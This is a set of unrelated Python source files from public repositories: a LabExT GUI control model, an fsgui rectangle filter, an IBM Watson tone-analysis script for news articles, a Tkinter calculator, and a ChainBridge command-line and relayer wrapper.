exctrl_vars_changed(self, *args):\n \"\"\"\n Called by Tkinter once any execution control variables changed.\n\n Parameters\n ----------\n *args\n Tkinter arguments, not needed.\n \"\"\"\n if not self.allow_GUI_changes:\n return\n\n # save udpates of control variables to log\n self.logger.debug('State of manual mode is: %s', self.var_mm_pause.get())\n self.logger.debug('State of auto move is: %s', self.var_auto_move.get())\n self.logger.debug('State of SFP enable is: %s', self.var_sfp_ena.get())\n self.logger.debug('Inter-measurement wait time is: %s', self.var_imeas_wait_time_str.get())\n\n # propagate change to experiment\n self.experiment_manager.exp.exctrl_pause_after_device = self.var_mm_pause.get()\n self.experiment_manager.exp.exctrl_auto_move_stages = self.var_auto_move.get()\n self.experiment_manager.exp.exctrl_enable_sfp = self.var_sfp_ena.get()\n\n # allow wait time changes only if manual mode is not activated\n if self.var_mm_pause.get():\n self.view.frame.control_panel.exctrl_wait_time.config(state='disabled')\n self.view.frame.control_panel.wait_time_lbl.config(state='disabled')\n else:\n self.view.frame.control_panel.exctrl_wait_time.config(state='normal')\n self.view.frame.control_panel.wait_time_lbl.config(state='normal')\n\n # convert wait time to float and check for positive-ness\n try:\n imeas_wait_time = float(self.var_imeas_wait_time_str.get())\n except ValueError:\n # text does not convert to float, so we skip updating the variable\n return\n\n if imeas_wait_time < 0.0:\n self.logger.info('Inter-measurement wait time cannot be negative. Setting to 0.0')\n imeas_wait_time = 0.0\n self.var_imeas_wait_time_str.set(\"0.0\")\n\n self.experiment_manager.exp.exctrl_inter_measurement_wait_time = imeas_wait_time\n\n def submodule_status_updated(self, *args):\n \"\"\"\n Callback on any status change of the submodules\n \"\"\"\n\n if not self.allow_GUI_changes:\n return\n\n # this variable should track Mover.mover_enabled\n has_connected_stages = bool(self.status_mover_connected_stages.get())\n # this variable should track Mover.trafo_enabled\n can_move_to_device = bool(self.status_mover_can_move_to_device.get())\n # this variable should track PeakSearcher.initialized\n sfp_init = bool(self.status_sfp_initialized.get())\n\n if not has_connected_stages:\n reason = \"No connected stages\"\n self.var_mm_pause.set(True)\n self.var_mm_pause_reason.set(reason)\n # self._main_window.exctrl_mm_pause.config(state='disabled')\n self.var_auto_move.set(False)\n self.var_auto_move_reason.set(reason)\n self.view.frame.control_panel.exctrl_auto_move.config(state='disabled')\n self.var_sfp_ena.set(False)\n self.var_sfp_ena_reason.set(reason)\n self.view.frame.control_panel.exctrl_sfp_ena.config(state='disabled')\n else:\n if not can_move_to_device:\n self.var_mm_pause.set(True)\n self.var_mm_pause_reason.set(\"Mover is not fully calibrated\")\n # self._main_window.exctrl_mm_pause.config(state='disabled')\n self.var_auto_move.set(False)\n self.var_auto_move_reason.set(\"Mover is not fully calibrated\")\n self.view.frame.control_panel.exctrl_auto_move.config(state='disabled')\n else:\n # self.var_mm_pause.set(X) # no change\n self.var_mm_pause_reason.set(\"\")\n # self._main_window.exctrl_mm_pause.config(state='normal')\n # self.var_auto_move.set(X) # no change\n self.var_auto_move_reason.set(\"\")\n self.view.frame.control_panel.exctrl_auto_move.config(state='normal')\n if not sfp_init:\n self.var_sfp_ena.set(False)\n self.var_sfp_ena_reason.set(\"Search-for-peak not initialized\")\n self.view.frame.control_panel.exctrl_sfp_ena.config(state='disabled')\n else:\n # self.var_sfp_ena.set(X) # no change\n self.var_sfp_ena_reason.set(\"\")\n self.view.frame.control_panel.exctrl_sfp_ena.config(state='normal')\n","repo_name":"LabExT/LabExT","sub_path":"LabExT/View/MainWindow/MainWindowModel.py","file_name":"MainWindowModel.py","file_ext":"py","file_size_in_byte":10075,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"3709656546","text":"import multiprocessing as mp\nimport numpy as np\nimport fsgui.process\nimport fsgui.node\nimport json\nimport shapely\n\nclass AxisAlignedRectangleFilterType(fsgui.node.NodeTypeObject):\n def __init__(self, type_id):\n super().__init__(\n type_id=type_id,\n node_class='filter',\n name='Axis-aligned rectangle filter',\n datatype='bool',\n default= {\n 'type_id': type_id,\n 'instance_id': '',\n 'nickname': 'Axis-aligned rectangle filter',\n 'source_id': None,\n 'lowerLeftX': 0,\n 'lowerLeftY': 0,\n 'upperRightX': 0,\n 'upperRightY': 0,\n }\n )\n\n def write_template(self, config = None):\n if config is None:\n config = self.default()\n return [\n {\n 'name': 'type_id',\n 'type': 'hidden',\n 'default': config['type_id'],\n },\n {\n 'name': 'instance_id',\n 'type': 'hidden',\n 'default': config['instance_id'],\n },\n {\n 'label': 'Nickname',\n 'name': 'nickname',\n 'type': 'string',\n 'default': config['nickname'],\n 'tooltip': 'This is the name the source is displayed as in menus.',\n },\n {\n 'label': 'Source',\n 'name': 'source_id',\n 'type': 'node:point2d',\n 'default': config['source_id'],\n 'tooltip': 'Source to receive spatial data from',\n },\n {\n 'label': 'Lower Left (X)',\n 'name': 'lowerLeftX',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['lowerLeftX'],\n 'units': 'pixels',\n },\n {\n 'label': 'Lower Left (Y)',\n 'name': 'lowerLeftY',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['lowerLeftY'],\n 'units': 'pixels',\n },\n {\n 'label': 'Upper Right (X)',\n 'name': 'upperRightX',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['upperRightX'],\n 'units': 'pixels',\n },\n {\n 'label': 'Upper Right (Y)',\n 'name': 'upperRightY',\n 'type': 'integer',\n 'lower': 0,\n 'upper': 2000,\n 'default': config['upperRightY'],\n 'units': 'pixels',\n },\n ]\n\n def build(self, config, addr_map):\n pub_address = addr_map[config['source_id']]\n \n lower_left = config['lowerLeftX'], config['lowerLeftY']\n upper_right = config['upperRightX'], config['upperRightY']\n\n def setup(reporter, data):\n data['sub'] = fsgui.network.UnidirectionalChannelReceiver(pub_address)\n data['filter_model'] = AxisAlignedRectangleFilter(lower_left, upper_right)\n\n def workload(connection, publisher, reporter, data):\n item = data['sub'].recv(timeout=500)\n if item is not None:\n x, y = tuple(map(float, item.split(',')))\n triggered = data['filter_model'].check_bounds(x, y)\n publisher.send(f'{triggered}')\n\n return fsgui.process.build_process_object(setup, workload)\n\nclass AxisAlignedRectangleFilter:\n def __init__(self, lower_left, upper_right, inclusive=True):\n self._lower_left = lower_left\n self._upper_right = upper_right\n\n if inclusive:\n self.check_bounds = self.__check_bounds_inclusive\n else:\n self.check_bounds = self.__check_bounds_exclusive\n \n def __check_bounds_inclusive(self, x, y):\n return x >= self._lower_left[0] and x <= self._upper_right[1] and y >= self._lower_left[1] and y <= self._upper_right[1]\n\n def __check_bounds_exclusive(self, x, y):\n return x > self._lower_left[0] and x < self._upper_right[1] and y > self._lower_left[1] and y < self._upper_right[1]\n","repo_name":"LorenFrankLab/fsgui","sub_path":"fsgui/filter/spatial/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26293745227","text":"import os\nimport pickle\nfrom ibm_watson import ToneAnalyzerV3\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\nauthenticator = IAMAuthenticator('PRIVATE KEY')\ntone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n authenticator=authenticator\n)\ntone_analyzer.set_service_url(\n 'https://api.us-south.tone-analyzer.watson.cloud.ibm.com/instances/ebd854a7-cb37-4e28-8069-95ebba735e06')\n\ncnn = dict()\nhp = dict()\nfox = dict()\nbb = dict()\n\nprint(\"Analyzing CNN...\")\nfor fname in os.listdir(r'.\\cnn'):\n date = fname.split(\"_\")[1]\n with open(\"cnn/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = cnn.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n cnn[date] = {tone['tone_name']: [tone['score']]}\n\nprint(\"Analyzing HuffPost...\")\nfor fname in os.listdir(r'.\\huffpost'):\n date = fname.split(\"_\")[1]\n with open(\"huffpost/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = hp.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n hp[date] = {tone['tone_name']: [tone['score']]}\n\nprint(\"Analyzing Fox...\")\nfor fname in os.listdir(r'.\\fox'):\n date = fname.split(\"_\")[1]\n with open(\"fox/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = fox.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n fox[date] = {tone['tone_name']: [tone['score']]}\n\nprint(\"Analyzing Breitbart...\")\nfor fname in os.listdir(r'.\\breitbart'):\n date = fname.split(\"_\")[1]\n with open(\"breitbart/\" + fname, \"r\", encoding='utf-8') as f:\n text = f.read().replace('\\n', '')\n ta = tone_analyzer.tone(\n {'text': text},\n sentences=False,\n content_type='application/json'\n ).get_result()\n for tone in ta['document_tone']['tones']:\n tDict = bb.get(date)\n if tDict:\n tList = tDict.get(tone['tone_name'])\n if tList:\n tList.append(tone['score'])\n else:\n tDict[tone['tone_name']] = [tone['score']]\n else:\n bb[date] = {tone['tone_name']: [tone['score']]}\n\nfor date in cnn:\n for tone in cnn[date]:\n toneScores = cnn[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n cnn[date][tone] = toneAvg\nfor date in hp:\n for tone in hp[date]:\n toneScores = hp[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n hp[date][tone] = toneAvg\nfor date in fox:\n for tone in fox[date]:\n toneScores = fox[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n fox[date][tone] = toneAvg\nfor date in bb:\n for tone in bb[date]:\n toneScores = bb[date][tone]\n toneAvg = sum(toneScores) / len(toneScores)\n bb[date][tone] = toneAvg\n\npickle.dump(cnn, open(\"cnn.p\", \"wb\"))\npickle.dump(hp, open(\"hp.p\", \"wb\"))\npickle.dump(fox, open(\"fox.p\", \"wb\"))\npickle.dump(bb, open(\"bb.p\", \"wb\"))\n","repo_name":"json1016/tonal_analysis","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5321386278","text":"from tkinter import *\r\n\r\nbase = Tk()\r\nbase.title('Calculator'); base.config(background = '#7A7A7A')\r\n\r\n#! CHANGE IT BEFORE POSTING IT\r\nicon_path = r'Projects\\\\calculator\\\\calculator-svg-png-icon-free-download-521113-onlinewebfontscom.png'\r\n# icon_path = input('Enter the path of the saved icon image:')\r\n\r\nbase.iconphoto(False, PhotoImage(file = icon_path))\r\n\r\ncalc = Frame(base, borderwidth = 2); calc.grid(row = 0, column = 0, padx = 5, pady = 5, columnspan = 4)\r\ntemp_calc = Frame(calc, borderwidth = 2); temp_calc.grid(row = 0, column = 0, padx = 2, pady = 2, columnspan = 4)\r\n\r\noperations_str, temp_operations_str, invalid_val, old_val, new_val, op, check_backspace, check_click = '', '', 'valid', '', '', '', 0, 0\r\n\r\ndef button_click(var):\r\n global operations_str, temp_operations_str, old_val, new_val, op, check_backspace, check_click\r\n\r\n if invalid_val == 'valid':\r\n\r\n if var == '.':\r\n temp_operations_str += '0.' if temp_operations_str == '' else '.'\r\n operations_str += '0.' if temp_operations_str == '0.' else '.'\r\n\r\n ent.delete(0, END); ent.insert(0, temp_operations_str)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\n new_val = temp_operations_str\r\n\r\n elif str(var) not in '+-x%':\r\n \r\n try:\r\n operations_str += str(var); temp_operations_str += str(var)\r\n\r\n if check_backspace == 1 or check_click == 1:\r\n old_val = float(temp_operations_str)\r\n\r\n else:\r\n new_val = float(temp_operations_str)\r\n\r\n ent.delete(0, END); ent.insert(0, temp_operations_str)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n \r\n except:\r\n invalid_operation()\r\n\r\n else:\r\n if not temp_operations_str:\r\n invalid_operation()\r\n\r\n else:\r\n check_backspace, check_click = 0, 0\r\n operation(op)\r\n\r\n op, temp_operations_str = str(var), ''\r\n operations_str += f'0 {op} ' if operations_str[-1] == '.' else f' {op} '\r\n\r\n ent.delete(0, END)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\ndef operation(key):\r\n global old_val, new_val, op\r\n\r\n if not old_val:\r\n old_val, op = float(temp_operations_str), key\r\n\r\n else:\r\n new_val = float(temp_operations_str)\r\n old_val = temp_result(float(old_val), key, float(new_val))\r\n\r\n ent.delete(0, END); ent.insert(0, old_val)\r\n temp_operation = Label(calc, text = old_val, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\ndef backspace():\r\n global operations_str, temp_operations_str, check_backspace\r\n\r\n if invalid_val == 'valid':\r\n check_backspace = 1\r\n\r\n operations_str = operations_str[-2::-1][::-1] if len(operations_str) > 0 else ''\r\n temp_operations_str = temp_operations_str[-2::-1][::-1] if len(temp_operations_str) > 0 else ''\r\n\r\n ent.delete(0, END); ent.insert(0, temp_operations_str)\r\n temp_operation = Label(calc, text = operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4) \r\n\r\ndef clear():\r\n global operations_str, temp_operations_str, invalid_val, old_val, new_val, ent, check_backspace, check_click\r\n\r\n operations_str, temp_operations_str, invalid_val, old_val, new_val, check_backspace, check_click = '', '', 'valid', '', '', 0, 0\r\n\r\n ent = Entry(temp_calc, bg = '#9B9B9B', fg = 'black', width = 26, font = ('Bahnschrift Light', '10', 'bold'), borderwidth = 4, justify=RIGHT); ent.grid(row = 0,column = 0, columnspan = 2)\r\n temp_operation = Label(calc, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\ndef temp_result(temp_old_val, temp_operation_key, temp_new_val):\r\n global old_val\r\n\r\n result_var = 0\r\n\r\n if temp_new_val == 0 and temp_operation_key == '%':\r\n invalid_operation()\r\n result_var = 0\r\n \r\n elif temp_operation_key == '+':\r\n result_var = temp_old_val + temp_new_val\r\n\r\n elif temp_operation_key == '-':\r\n result_var = temp_old_val - temp_new_val\r\n\r\n elif temp_operation_key == 'x':\r\n result_var = temp_old_val * temp_new_val\r\n\r\n elif temp_operation_key == '%':\r\n result_var = temp_old_val / temp_new_val\r\n\r\n else:\r\n result_var = temp_old_val\r\n\r\n old_val = result_var\r\n\r\n return result_var\r\n\r\ndef result():\r\n global old_val, new_val, op, operations_str, temp_operations_str, check_click\r\n\r\n if old_val == '' or new_val == '':\r\n old_val = float(temp_operations_str)\r\n result = old_val\r\n\r\n else:\r\n result = temp_result(float(old_val), op, float(new_val))\r\n old_val, op, new_val, operations_str, temp_operations_str = result, '', '', str(result), str(result)\r\n\r\n check_click = 1\r\n ent.delete(0, END); ent.insert(0, operations_str)\r\n temp_operation = Label(calc, text = temp_operations_str, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4) \r\n\r\ndef invalid_operation():\r\n global invalid_val\r\n\r\n clear()\r\n invalid_val = 'invalid'\r\n\r\n ent = Entry(temp_calc, bg = '#9B9B9B', fg = 'black', width = 26, font = ('Bahnschrift Light', '10', 'bold'), borderwidth = 4, justify=CENTER); ent.grid(row = 0,column = 0, columnspan = 2)\r\n ent.insert(0, 'Invalid Operation !')\r\n temp_operation = Label(calc, width = 73, text = 'Invalid Operation !', font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\nent = Entry(temp_calc, bg = '#9B9B9B', fg = 'black', width = 26, font = ('Bahnschrift Light', '10', 'bold'), borderwidth = 4, justify=RIGHT); ent.grid(row = 0,column = 0, columnspan = 2)\r\n\r\nbutton_7 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '7', command = lambda: button_click('7')); button_7.grid(row = 1, column = 0)\r\nbutton_8 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '8', command = lambda: button_click('8')); button_8.grid(row = 1, column = 1)\r\nbutton_9 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '9', command = lambda: button_click('9')); button_9.grid(row = 1, column = 2)\r\n\r\nbutton_4 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '4', command = lambda: button_click('4')); button_4.grid(row = 2, column = 0)\r\nbutton_5 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '5', command = lambda: button_click('5')); button_5.grid(row = 2, column = 1)\r\nbutton_6 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '6', command = lambda: button_click('6')); button_6.grid(row = 2, column = 2)\r\n\r\nbutton_1 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '1', command = lambda: button_click('1')); button_1.grid(row = 3, column = 0)\r\nbutton_2 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '2', command = lambda: button_click('2')); button_2.grid(row = 3, column = 1)\r\nbutton_3 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '3', command = lambda: button_click('3')); button_3.grid(row = 3, column = 2)\r\n\r\nbutton_0 = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#CBCBCB', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '0', command = lambda: button_click('0')); button_0.grid(row = 4, column = 0)\r\n\r\nbutton_back = Button(temp_calc, width= 12, padx = 2, pady = 2, borderwidth = 3, bg = '#A1A1A1', fg = 'black', font = ('Calibri Light (Headings)', '10', 'bold'), text = '<<', command = backspace); button_back.grid(row = 0, column = 2)\r\nbutton_clr = Button(temp_calc, width= 12, padx = 2, pady = 2, borderwidth = 3, bg = '#A1A1A1', fg = 'black', font = ('Calibri Light (Headings)', '10', 'bold'), text = 'Clear', command = clear); button_clr.grid(row = 0, column = 3)\r\nbutton_add = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '+', command = lambda: button_click('+')); button_add.grid(row = 1, column = 3)\r\nbutton_subtract = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '-', command = lambda: button_click('-')); button_subtract.grid(row = 2, column = 3)\r\nbutton_multiply = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = 'x', command = lambda: button_click('x')); button_multiply.grid(row = 4, column = 1)\r\nbutton_divide = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '%', command = lambda: button_click('%')); button_divide.grid(row = 4, column = 2)\r\nbutton_decimal = Button(temp_calc, width = 11, pady = 10, borderwidth = 2, bg = '#B0B0B0', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '.', command = lambda: button_click('.')); button_decimal.grid(row = 3, column = 3)\r\nbutton_equal = Button(temp_calc, width = 11, pady = 9, borderwidth = 3, bg = '#9B9B9B', fg = 'black', font = ('Calibri Light (Headings)', '11', 'bold'), text = '=', command = result); button_equal.grid(row = 4, column = 3)\r\n\r\ntemp_operation = Label(calc, width = 73, font = ('Bahnschrift', '8'), bg = '#A1A1A1', fg = 'black', borderwidth = 1, relief = SUNKEN, anchor = E); temp_operation.grid(row = 5, column = 0, columnspan = 4)\r\n\r\nbase.mainloop()","repo_name":"parthratra11/Calculator-Tkinter","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":11337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41064231172","text":"import subprocess\nfrom typing import List\nfrom web3 import HTTPProvider, Web3\nfrom utils.sys_mod import check_program\nfrom utils.resource_manager import available_contracts\nfrom utils.contracts_utils import load_abi\nfrom model.contract import ContractTypes\nfrom model.node import Node\nimport logging\nimport os\nimport json\n\nCONFIG_JSON_FILE = 'resources/config.json'\n\n\nclass CBWrapper():\n '''This is a simple wrapper to call cb-sol-cli functions from\n python. For config and params info check the official documentation at\n https://github.com/ChainSafe/chainbridge-deploy/blob/main/cb-sol-cli/README.md#usage\n This wrapper is also used to manage chainbridge relay.'''\n\n def __init__(self):\n self.cb_sol_cli = check_program(\"cb-sol-cli\")\n self.chainbridge = check_program(\"chainbridge\")\n if not self.cb_sol_cli:\n exit(\"No cb-sol-cli. Please install cb-sol-cli.\")\n if not self.chainbridge:\n print(\"Chainbridge relayer not installed\")\n else:\n if self.is_relayer_running():\n logging.info(\"Bridge already running, it will not be started\")\n\n def _basic_config(self, gateway: str, pkey: str, gas: int):\n return ['cb-sol-cli', '--url', gateway, '--privateKey',\n pkey, '--gasPrice', str(gas)]\n\n def _run_command(self, params) -> subprocess.CompletedProcess:\n logging.info(params)\n out = subprocess.run(params, capture_output=True)\n print(out.stdout.decode(\"UTF-8\"))\n return out\n\n def is_relayer_running(self):\n if self.chainbridge:\n params = ['pgrep', 'chainbridge']\n out = subprocess.run(params, capture_output=True)\n return not out.returncode\n else:\n return False\n\n def start_relay(self, latest: bool = False, start_block: int = None):\n if latest and start_block:\n raise ValueError(\n \"You can't specify both latest and from_block params.\")\n params = ['nohup', 'chainbridge', '--config',\n os.path.abspath(CONFIG_JSON_FILE), '--verbosity', 'trace', '&']\n if latest:\n params.append(\"--latest\")\n if start_block:\n params.append(\"--startBlock\")\n params.append(start_block)\n logging.info(\"Starting chainbridge relay\")\n subprocess.Popen(params, cwd=os.path.realpath('..'))\n\n def stop_relay(self):\n logging.info(\"Stopping chainbridge relay\")\n params = ['pgrep', 'chainbridge']\n relay = subprocess.Popen(params, stdout=subprocess.PIPE)\n subprocess.run(['xargs', '-I{}', 'kill', \"{}\"], stdin=relay.stdout)\n\n def deploy(self, gateway: str, pkey: str, gas: int, contracts_to_deploy: List[ContractTypes],\n relayer_addresses: List[str], relayer_threshold: int, chain_id: int):\n params = self._basic_config(gateway, pkey, gas)\n params.append('deploy')\n for contract in contracts_to_deploy:\n # If the list contains an address it is used as bridge address\n if \"0x\" in contract:\n params += ['--bridgeAddress', contract]\n else:\n params += [\"--\"+contract]\n if ContractTypes.BRIDGE in contracts_to_deploy:\n params.append('--relayers')\n params += relayer_addresses\n params += ['--relayerThreshold',\n str(relayer_threshold), \"--chainId\", str(chain_id)]\n return self._run_command(params)\n\n def register_resource(self, gateway: str, pkey: str, gas: int, bridge_addr: str,\n handler_addr: str, resource_id: str, target_contract: str):\n params = self._basic_config(gateway, pkey, gas)\n params.insert(1, 'bridge')\n params.insert(2, 'register-resource')\n params += ['--bridge', bridge_addr, '--handler', handler_addr, '--resourceId', resource_id,\n '--targetContract', target_contract]\n return self._run_command(params)\n\n def burnable(self, gateway: str, pkey: str, gas: int, bridge_addr: str,\n handler_addr: str, target_contract: str):\n params = self._basic_config(gateway, pkey, gas)\n params.insert(1, 'bridge')\n params.insert(2, 'set-burn')\n params += ['--bridge', bridge_addr, '--handler',\n handler_addr, '--tokenContract', target_contract]\n return self._run_command(params)\n\n def add_minter(self, gateway: str, pkey: str, gas: int, type: ContractTypes, minter: str, target_contract: str):\n params = self._basic_config(gateway, pkey, gas)\n if type == ContractTypes.ERC20:\n params.insert(1, 'erc20')\n params += ['--erc20Address', target_contract]\n elif type == ContractTypes.ERC721:\n params.insert(1, '--erc721')\n params += ['--erc721Address', target_contract]\n params.insert(2, 'add-minter')\n params += ['--minter', minter]\n return self._run_command(params)\n\n def approve(self, gateway: str, pkey: str, gas: int, type: ContractTypes, amount: int, target: str,\n recipient: str):\n params = self._basic_config(gateway, pkey, gas)\n if type == ContractTypes.ERC20:\n params.insert(1, \"erc20\")\n params += ['--amount', str(amount), '--erc20Address', target]\n elif type == ContractTypes.ERC721:\n params.insert(1, \"erc721\")\n params += ['--id', hex(amount), '--erc721Address', target]\n params.insert(2, 'approve')\n params += ['--recipient', recipient]\n return self._run_command(params)\n\n # This is used for the patched version of the bridge\n def manual_deposit(self, gateway: str, chain_id: int, pkey: str, gas: int, amount: int,\n bridge: str, token_addr: str, resource_id: str):\n w3 = Web3(HTTPProvider(gateway))\n account = w3.eth.account.from_key(pkey)\n abi = load_abi(\"crosscoin/build/contracts/BridgeWithdrawPatch.json\")\n contract = w3.eth.contract(address=bridge, abi=abi)\n # Fire deposit transaction\n token_addr = w3.toBytes(\n hexstr=token_addr).rjust(32, b'\\0')\n user_addr = w3.toBytes(\n hexstr=account.address).rjust(32, b'\\0')\n amount = w3.toBytes(\n w3.toWei(1, \"ether\")).rjust(32, b'\\0')\n data = token_addr + user_addr + amount\n fee_data = w3.toBytes(0).rjust(32, b'\\0')\n t_dict = {\"chainId\": w3.eth.chain_id,\n \"nonce\": w3.eth.get_transaction_count(account.address, 'pending'),\n \"gasPrice\": w3.toWei(10,\"gwei\"),\n \"gas\": gas}\n tx = contract.functions.deposit(\n chain_id, w3.toBytes(hexstr=resource_id), data, fee_data).buildTransaction(t_dict)\n signed_tx = w3.eth.account.sign_transaction(tx, account.key)\n tx_hash = w3.eth.send_raw_transaction(\n signed_tx.rawTransaction)\n logging.info(account.address + ' is depositing ' + str(data) + ' on chain ' + str(\n t_dict['chainId']) + \" tx_hash \" + tx_hash.hex())\n receipt = w3.eth.wait_for_transaction_receipt(tx_hash)\n print(\"root update tx_receipt: \" + str(receipt))\n\n def deposit(self, gateway: str, pkey: str, gas: int, type: ContractTypes, amount: int, dest: int,\n bridge: str, recipient: str, resource_id: str):\n params = self._basic_config(gateway, pkey, gas)\n if type == ContractTypes.ERC20:\n params.insert(1, \"erc20\")\n params += ['--amount', str(amount)]\n elif type == ContractTypes.ERC721:\n params.insert(1, \"erc721\")\n params += ['--id', hex(amount)]\n params.insert(2, 'deposit')\n params += ['--dest', str(dest), '--bridge', bridge,\n '--recipient', recipient, '--resourceId', resource_id]\n return self._run_command(params)\n\n def balance(self, gateway: str, type: ContractTypes, address: str, resource: str):\n params = ['cb-sol-cli']\n if type == ContractTypes.ERC20:\n params += ['erc20', 'balance', '--address',\n address, '--erc20Address', resource]\n elif type == ContractTypes.ERC721:\n params += ['erc721', 'owner', '--erc721Address',\n address, '--id', resource]\n params += ['--url', gateway]\n self._run_command(params)\n\n def update_config_json(self, endpoint: Node, type):\n logging.info(\"Updating chainbridge conf.\")\n if self.is_relayer_running():\n self.stop_relay()\n chain_id = endpoint.chain_id\n with open(CONFIG_JSON_FILE, 'r+') as f:\n jsonfile = json.load(f)\n contracts = available_contracts(chain_id, type)\n has_chain = False\n # we search for the right chain config json object in the whole list\n for i in range(len(jsonfile['chains'])):\n if jsonfile['chains'][i]['id'] == str(chain_id):\n has_chain = True\n # Node endpoint may be changed!\n jsonfile['chains'][i]['endpoint'] = endpoint.node_endpoint\n # For each contract available in the chain we update the address on the json\n # so it makes no difference if we used a erc20/721/generic handler contract\n for contract in contracts.values():\n if contract.type == 'erc20' or contract.type == 'erc721':\n # The config file does not contain the erc20/721 endpoint\n # so we skip them\n pass\n else:\n jsonfile['chains'][i]['opts'][contract.type] = contract.address\n if not has_chain:\n # We configure the second chain item as a new chain\n jsonfile['chains'][1]['id'] = str(chain_id)\n 